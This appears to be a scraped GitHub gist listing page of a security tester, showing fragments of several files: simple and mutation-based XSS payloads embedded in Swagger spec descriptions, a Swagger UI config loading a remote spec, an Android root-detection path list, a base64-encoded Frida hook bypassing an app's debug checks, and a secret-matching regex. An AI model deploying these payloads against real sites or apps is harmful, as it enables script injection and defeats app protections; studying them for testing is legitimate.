haidv haidv35

## test
123'"><img src=x onerror=alert(origin)>

## bypass.js
const commonPaths = [
  "/data/local/bin/su",
  "/data/local/su",
  "/data/local/xbin/su",
  "/dev/com.koushikdutta.superuser.daemon/",
  "/sbin/su",
  "/system/app/Superuser.apk",
  "/system/bin/failsafe/su",
  "/system/bin/su",
  "/su/bin/su",

## Secret-leak.txt
(?i)((access_key|access_token|admin_pass|admin_user|algolia_admin_key|algolia_api_key|alias_pass|alicloud_access_key|amazon_secret_access_key|amazonaws|ansible_vault_password|aos_key|api_key|api_key_secret|api_key_sid|api_secret|api.googlemaps AIza|apidocs|apikey|apiSecret|app_debug|app_id|app_key|app_log_level|app_secret|appkey|appkeysecret|application_key|appsecret|appspot|auth_token|authorizationToken|authsecret|aws_access|aws_access_key_id|aws_bucket|aws_key|aws_secret|aws_secret_key|aws_token|AWSSecretKey|b2_app_key|bashrc password|bintray_apikey|bintray_gpg_password|bintray_key|bintraykey|bluemix_api_key|bluemix_pass|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id|bucketeer_aws_secret_access_key|built_branch_deploy_key|bx_password|cache_driver|cache_s3_secret_key|cattle_access_key|cattle_secret_key|certificate_password|ci_deploy_password|client_secret|client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key|cloudant_password|cloudflare_api_key|cloudflare_auth_k

## x.json
{
    "url": "https://gist.githubusercontent.com/haiclover/9161dd07647ac83a1ea5826d60e39504/raw/7547b859e7f15ba94b1bfed805bc4f7a1d80f2d3/swagger.yaml",
    "urls": [{
        "url": "https://gist.githubusercontent.com/haiclover/9161dd07647ac83a1ea5826d60e39504/raw/7547b859e7f15ba94b1bfed805bc4f7a1d80f2d3/swagger.yaml",
        "name": "Foo"
    }]
}

## test_final.yaml
swagger: '2.0'
info:
  title: Example yaml.spec
  description: |
    <math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><style><a title="</style><a href="data:text/plain,1111">bbbbbb</a>"><svg onload=alert(1)>
paths:
  /accounts:
    get:
      responses:
        '200':

## get_crobat_domains.py
# pip3 install requests argparse
# @author: @aetsu

import logging
import requests
import json
import urllib3
import socket
import sys
import argparse

## swagger.yaml
swagger: '2.0'
info:
  title: Classic API Resource Documentation
  description: |
    <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert(origin) src=1>"></form>

  version: production
basePath: /JSSResource/
produces:
  - application/xml

## abcxyz
SmF2YS5wZXJmb3JtKGZ1bmN0aW9uKCkgewogICAgY29uc3QgU3lzdGVtID0gSmF2YS51c2UoJ2phdmEubGFuZy5TeXN0ZW0nKTsKICAgIGNvbnN0IFJ1bnRpbWUgPSBKYXZhLnVzZSgnamF2YS5sYW5nLlJ1bnRpbWUnKTsKICAgIGNvbnN0IFZNU3RhY2sgPSBKYXZhLnVzZSgnZGFsdmlrLnN5c3RlbS5WTVN0YWNrJyk7CgogICAgU3lzdGVtLmxvYWQuaW1wbGVtZW50YXRpb24gPSBmdW5jdGlvbihsaWJyYXJ5KSB7CiAgICAgICAgdHJ5IHsKICAgICAgICAgICAgY29uc29sZS5sb2coJ1N5c3RlbS5sb2FkKCInICsgbGlicmFyeSArICciKScpOwogICAgICAgICAgICBSdW50aW1lLmdldFJ1bnRpbWUoKS5uYXRpdmVMb2FkKGxpYnJhcnksIFZNU3RhY2suZ2V0Q2FsbGluZ0NsYXNzTG9hZGVyKCkpOwogICAgICAgIH0gY2F0Y2goZXgpIHsKICAgICAgICAgICAgY29uc29sZS5sb2coZXgpOwogICAgICAgIH0KICAgIH07CgogICAgU3lzdGVtLmxvYWRMaWJyYXJ5LmltcGxlbWVudGF0aW9uID0gZnVuY3Rpb24obGlicmFyeSkgewogICAgICAgIHRyeSB7CiAgICAgICAgICAgIGNvbnNvbGUubG9nKCdTeXN0ZW0ubG9hZExpYnJhcnkoIicgKyBsaWJyYXJ5ICsgJyIpJyk7CiAgICAgICAgICAgIGlmKGxpYnJhcnkgPT0gIm5hdGl2ZS1saWIiKXsKICAgICAgICAgICAgICAgIGNvbnN0IGFhID0gSmF2YS51c2UoJ3ZuLmNvbS52aWV0dGVsLnZkcy52YW5pbGxhbGliLmFwcC5zZWN1cml0eS5VdGlscycpOwogICAgICAgICAgICAgICAgYWEuaXNEZWJ1Z0J1aWxkLmlt

## test.css
body{
  background: black;
}

## xss.svg

      
        
          
            
              
              1 file
            
          
          
            
              
              0 forks
            
          
          
            
              
              0 comments
            
          
          
            
              
              0 stars
            
          
        
        
          
              
          
          
            
                haidv35
                / xss.svg
            
            
              Created
              June 27, 2022 08:53
            
              
                xss.svg
              
          
        
      
        
  
    
    

          
    
        Loading

      Sorry, something went wrong. Reload?
      Sorry, we cannot display this file.
      Sorry, this file is invalid so it cannot be displayed.
      
          Viewer requires iframe.
	const commonPaths = [
	"/data/local/bin/su",
	"/data/local/su",
	"/data/local/xbin/su",
	"/dev/com.koushikdutta.superuser.daemon/",
	"/sbin/su",
	"/system/app/Superuser.apk",
	"/system/bin/failsafe/su",
	"/system/bin/su",
	"/su/bin/su",
	{
	"url": "https://gist.githubusercontent.com/haiclover/9161dd07647ac83a1ea5826d60e39504/raw/7547b859e7f15ba94b1bfed805bc4f7a1d80f2d3/swagger.yaml",
	"urls": [{
	"url": "https://gist.githubusercontent.com/haiclover/9161dd07647ac83a1ea5826d60e39504/raw/7547b859e7f15ba94b1bfed805bc4f7a1d80f2d3/swagger.yaml",
	"name": "Foo"
	}]
	}
	swagger: '2.0'
	info:
	title: Example yaml.spec
	description: \|
	<math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><style><a title="</style><a href="data:text/plain,1111">bbbbbb</a>"><svg onload=alert(1)>
	paths:
	/accounts:
	get:
	responses:
	'200':
	# pip3 install requests argparse
	# @author: @aetsu

	import logging
	import requests
	import json
	import urllib3
	import socket
	import sys
	import argparse
	swagger: '2.0'
	info:
	title: Classic API Resource Documentation
	description: \|
	<form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert(origin) src=1>"></form>

	version: production
	basePath: /JSSResource/
	produces:
	- application/xml